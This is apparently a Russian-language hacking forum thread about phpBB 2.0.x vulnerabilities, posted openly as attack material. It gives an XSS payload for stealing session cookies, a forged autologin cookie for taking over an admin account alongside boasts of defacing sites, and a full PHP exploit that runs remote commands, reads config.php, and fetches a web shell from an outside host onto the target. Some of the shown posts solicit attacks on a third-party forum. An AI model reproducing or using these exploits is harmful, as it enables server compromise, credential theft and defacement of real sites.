• XSS.stack #1 – первый литературный журнал от юзеров форума

Phpbb-обзор дырок

Межсайтовый скриптинг в phpbb форуме
Программа: phpbb 2.0.16

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость в phpbb форуме позволяет удаленному пользователю выполнить XSS нападение.

Удаленный пользователь может вставить специально обработанную комбинацию BB тегов в сообщение форума, чтобы выполнить произвольный код в браузере пользователя, посетившего злонамеренное сообщение. Уязвимость может использоваться для похищения конфиденциальной информации пользователя (идентификатор сессии или куки).

Пример/Эксплоит:

www.ut[url=www.s='' style='font-siz...t.cookie; this.sss=null`style='font-size:0;] [/url]'

На месте ЦВЕТ_ФОНА следует вписать код фона в сообщении, применяемом в данной шкуре форума. Для стандартного subsilver это #EFEFEF. Это сделано для того, чтобы невооруженным глазом внедрение нашего сплоита не было заметно на других браузерах, где код хотя и воспринимается некорректно, практической пользы не принесет, а вместо этого выкенет в браузер длинную некрасивую ссылку.
 
Не такая уж и новая бага в phpbb с подменой куков.
Актуальна для версий с 2.0.6 по 2.0.12 включительно.
Заключается в подмене ваших куков на a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

Это дает нам админские возможности. По взлому снял видюху: http://vietnamwar.ru/winux/phpbb.rar

Убедительная просьбе не дефейсить то что я уже отдефейсил и не ломать того, кото я взломал в видюхе.


я точ также сделал как и ты даже на том же форуме а толку 0!
 
На том форуме я помог багу профиксить. Я не мудак дружественные форумы хакать.
На многих форумах бага профиксена, но как говорится если мозгов нет, то что ты хочешь? Без обид ;)
 
А в 2.0.16 ещё никаких дырок не нашли?
Добавлено Jul 9 2005, 07:01 AM
А то у меня просто на сайте стоит вот и думаю обновлять или нет? wink.gif
Читай тему сначала.
Межсайтовый скриптинг в phpbb форуме
Программа: phpbb 2.0.16

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость в phpbb форуме позволяет удаленному пользователю выполнить XSS нападение.

Удаленный пользователь может вставить специально обработанную комбинацию BB тегов в сообщение форума, чтобы выполнить произвольный код в браузере пользователя, посетившего злонамеренное сообщение. Уязвимость может использоваться для похищения конфиденциальной информации пользователя (идентификатор сессии или куки).

Пример/Эксплоит:

www.ut[url=www.s='' style='font-siz...t.cookie; this.sss=null`style='font-size:0;] [/url]'

На месте ЦВЕТ_ФОНА следует вписать код фона в сообщении, применяемом в данной шкуре форума. Для стандартного subsilver это #EFEFEF. Это сделано для того, чтобы невооруженным глазом внедрение нашего сплоита не было заметно на других браузерах, где код хотя и воспринимается некорректно, практической пользы не принесет, а вместо этого выкенет в браузер длинную некрасивую ссылку.
 
Очередной сплойт. ненаю какую багу юзает. Нам его любезно предоставил SAD. А вот и он:
Код:
<?php
// phpBB<=2.0.15 remote command execution exploit v1.42 by Sad, icq 2257763
// 02.07.2005
// Last modified: 13.07.2005

session_start();
if (isset($_POST['url'], $_POST['topic'], $_POST['cmd']))
{
 $_SESSION['url'] = $_POST['url'];
 $_SESSION['topic'] = $_POST['topic'];
 $_SESSION['cmd'] = $_POST['cmd'];
}
else
{
 $_SESSION['url'] = 'http://';
 $_SESSION['topic'] = 1;
 $_SESSION['cmd'] = '_info_';
}
?>
<html>
<title>phpBB&lt;=2.0.15 remote command execution exploit by Sad</title>
<body bgcolor='black' text='gray'>
<style>
textarea
{
 background-color: black;
 color: green;
}
input
{
 background-color: black;
 color: gray;
}
</style>
<pre>
<form action="<?=$_SERVER['REQUEST_URI']?>" method="POST">
url:<input name="url" type="text" value="<?=$_SESSION['url']?>" size=50> example: http://www.host.com/phpBB2/ <-- note ending slash
topic_num:<input name="topic" type="text" value="<?=$_SESSION['topic']?>" size=5> example: 1
cmd:<input name="cmd" type="text" value="<?=$_SESSION['cmd']?>" size=100> example: id;pwd;ls -lah;uname -a
<input type="submit" value="Exploit">
</form>
<?php

set_time_limit(120);

require_once 'sad_functions.php';
sad_exec_time();
if (empty($_POST['url']) || empty($_POST['topic']) || empty($_POST['cmd']))
die('Please fill out all fields.');

if ($_POST['cmd'] == '_info_')
{
 $query = $_POST['url'].'viewtopic.php?t='.$_POST['topic']."&highlight='.phpinfo().'";
 $answer = sad_get($query);
 $startpos = strpos($answer, '<title>phpinfo()</title>')+strlen('<title>phpinfo()</title>');
 $result = substr($answer, $startpos, strpos($answer, '<h2>PHP License</h2>')-$startpos);
 if (strpos($result, 'PHP Version') === false) echo 'Exploit failed =(';
 else echo "Exploited successfully. phpinfo() output:\r\n";
 echo $result;
}
elseif ($_POST['cmd'] == '_up_')
{
 $shell2upload = 'http://nightsite.nm.ru/';
 $query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
 "&highlight='.eval(\$_GET[cmd]).'&cmd=".
 rawurlencode("fputs(fopen('./includes/sh.php', 'w'), file_get_contents('$shell2upload'));");
 sad_get($query);
 if (strpos(sad_get($_POST['url'].'includes/sh.php'), '200 OK') === false)
 echo 'File upload failed =(';
 else echo "File successfully uploaded =)\r\n<a href='".
 $_POST['url']."includes/sh.php' target=_blank>Open shell</a>";
}
elseif ($_POST['cmd'] == '_echo_')
{
 $query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
 "&highlight='.eval(\$_GET[cmd]).'&cmd=".
 rawurlencode('passthru(\'echo \\\'<?php\\\'>./upload.php;'.
 'echo -e \\\'move_uploaded_file($_FILES[\047userfile\047][\047tmp_name\047], dirname($_SERVER[\047SCRIPT_FILENAME\047]).\047/\047.basename($_FILES[\047userfile\047][\047name\047]));\\\'>>./upload.php;'.
 'echo \\\'?>\\\'>>./upload.php\');');
 sad_get($query);
 if (strpos(sad_get($_POST['url'].'upload.php'), '200 OK') === false)
 echo 'failed =(';
 else echo "File successfully created =)\r\n<a href='".
 $_POST['url']."upload.php' target=_blank>Open</a>";
}
elseif (substr($_POST['cmd'], 0 , 4) == '_w_:')
{
 $dir = substr($_POST['cmd'], 4);
 $query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
 "&highlight='.eval(\$_GET[cmd]).'&cmd=echo%20'_RESULT_START_';var_dump(is_writable('$dir'));echo%20'_RESULT_END_';";
 $answer = sad_get($query);
 $startpos = strpos($answer, '_RESULT_START_')+strlen('_RESULT_START_');
 $result = substr($answer, $startpos, strpos($answer, '_RESULT_END_')-$startpos);
 $result = convert_cyr_string($result, 'a', 'w');
 echo 'Is "'.$dir.'" writeable?
'.htmlspecialchars($result);
}
elseif ($_POST['cmd'] == '_eval_')
{
 $code = 'echo "any php code here\r\n";
 $dir = ".";
 $handle = opendir($dir);
 echo "Reading directory ".realpath($dir)."\r\n\r\n";
 while (false !== ($file = readdir($handle)))
 {
  echo $file;
  if (is_dir($file)) echo " [DIR]";
  if (is_writable($file)) echo " w =)";
  echo "\r\n";
 }
 readfile("config.php");';

 $query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
 "&highlight='.eval(\$_GET[cmd]).'&cmd=echo%20'_RESULT_START_';".
 rawurlencode($code)."echo%20'_RESULT_END_';";
 $answer = sad_get($query);
 if (strpos($answer, '_RESULT_START_') === false)
 echo 'Exploit failed =(';
 else
 {
  echo "Code successfully executed. Scenario output:\r\n\r\n<textarea rows=20 cols=90 readonly>";
  $startpos = strpos($answer, '_RESULT_START_')+strlen('_RESULT_START_');
  $result = substr($answer, $startpos, strpos($answer, '_RESULT_END_')-$startpos);
  $result = convert_cyr_string($result, 'a', 'w');
  echo htmlspecialchars($result)."</textarea>\r\n";
 }
}
else
{
 $query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
 "&highlight='.eval(\$_GET[cmd]).'&cmd=echo%20'_RESULT_START_';passthru('".
 rawurlencode($_POST['cmd']).
 "');echo%20'_RESULT_END_';";

 $answer = sad_get($query);
 if (strpos($answer, '_RESULT_START_') === false)
 echo 'Exploit failed =(';
 else
 {
  echo "Exploited successfully. Result:\r\n<textarea rows=20 cols=90 readonly>";
  $startpos = strpos($answer, '_RESULT_START_')+strlen('_RESULT_START_');
  $result = substr($answer, $startpos, strpos($answer, '_RESULT_END_')-$startpos);
  $result = convert_cyr_string($result, 'a', 'w');
  echo htmlspecialchars($result).'</textarea>';
 }
}

echo '
'.sad_exec_time();
//&highlight='.eval($_GET[c]).'&c=include%20'http://localhost/php/upload.txt';
?>
</pre></body></html>
 
Здрасти, я тут новенький в этом деле, вобщем нужна помощь, у меня сайт в локале стоит, на нем есть форум phpbb 2.0.6, пробовал через куки, неполучаеца потому что там авторизация идет прям на сайте, а не на форуме, что можно еще попробовать сделать?

P.S. пощупайте ктонить этот вот буржуйский платный форум http://www.revamped.org/forums.html
Ваще офигели все платно сделали, кароч чонить сделайте с этим форумом:)
 
Ваще офигели все платно сделали, кароч чонить сделайте с этим форумом
Хоре наглеть, тут никто не будет щупать ваши форумы. Мы не ломаем на заказ и не хотим иметь проблемы с чужими сайтами..

потому что там авторизация идет прям на сайте, а не на форуме
Не понял? А это тут при чем? Разница то какая?
 
Дык вот, не получаеца,куки меняю и нечо не выходит, на обычных форумах получалось,а вот на таких где авторизируешься сначало на сайте - не выходит, к примеру такой форум с авторизацией на сайте http://www.revamped.org/forums.html
ток там форум выше версией, но всё же...
 
Новый способ. Создаем GIF файл содержания:

Код:
GIF8<script>alert('visit xss.pro/')</script>

Это пример. Заливаем это в качестве аватара. Получается хорошенькая XSS/ Радуемся.
 
что заливать понятно, вопрос в другом - как? в phpbb 2.0.6 нет возможности добавлять свои аватары, интересно через смайлы можно залить шелл?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх